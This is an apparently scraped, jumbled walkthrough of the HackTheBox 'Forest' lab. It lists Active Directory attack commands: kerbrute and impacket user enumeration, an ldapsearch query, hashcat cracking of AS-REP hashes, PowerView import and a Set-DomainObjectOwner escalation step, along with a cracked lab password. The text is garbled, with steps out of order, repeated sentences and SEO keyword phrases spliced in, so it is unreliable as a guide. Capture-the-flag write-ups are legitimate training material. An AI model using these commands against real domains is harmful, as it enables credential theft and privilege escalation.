Forest Hackthebox - Walkthrough Best

Save the hash and crack it with hashcat (mode 18200 for AS-REP hashes).

hashcat -m 18200 asreproast.hashes /usr/share/wordlists/rockyou.txt --force

Result: s3rvice (password for svc-alfresco)

Import-Module .\powerview.ps1

Now we have a list of ~30 potential usernames. Instead of password spraying (noisy), we will perform AS-REP Roasting.

What is it?
If a user has the DONT_REQ_PREAUTH flag set (disabled pre-authentication), we can request an encrypted timestamp (AS-REP) and crack it offline like a hash. forest hackthebox walkthrough best

Use enum4linux or impacket-GetADUsers to list domain users.

impacket-GetADUsers -dc-ip 10.10.10.161 htb.local/

Alternatively, use kerbrute to brute usernames from a wordlist: Save the hash and crack it with hashcat

kerbrute userenum --dc 10.10.10.161 -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

But for efficiency, we can also use ldapsearch:

ldapsearch -x -H ldap://10.10.10.161 -b "CN=Users,DC=htb,DC=local" | grep sAMAccountName

Users found: svc-alfresco, sebastien, lucinda, andy, mark, santi. Result: s3rvice (password for svc-alfresco )

Set-DomainObjectOwner -Identity "Exchange Windows Permissions" -OwnerIdentity "svc-alfresco"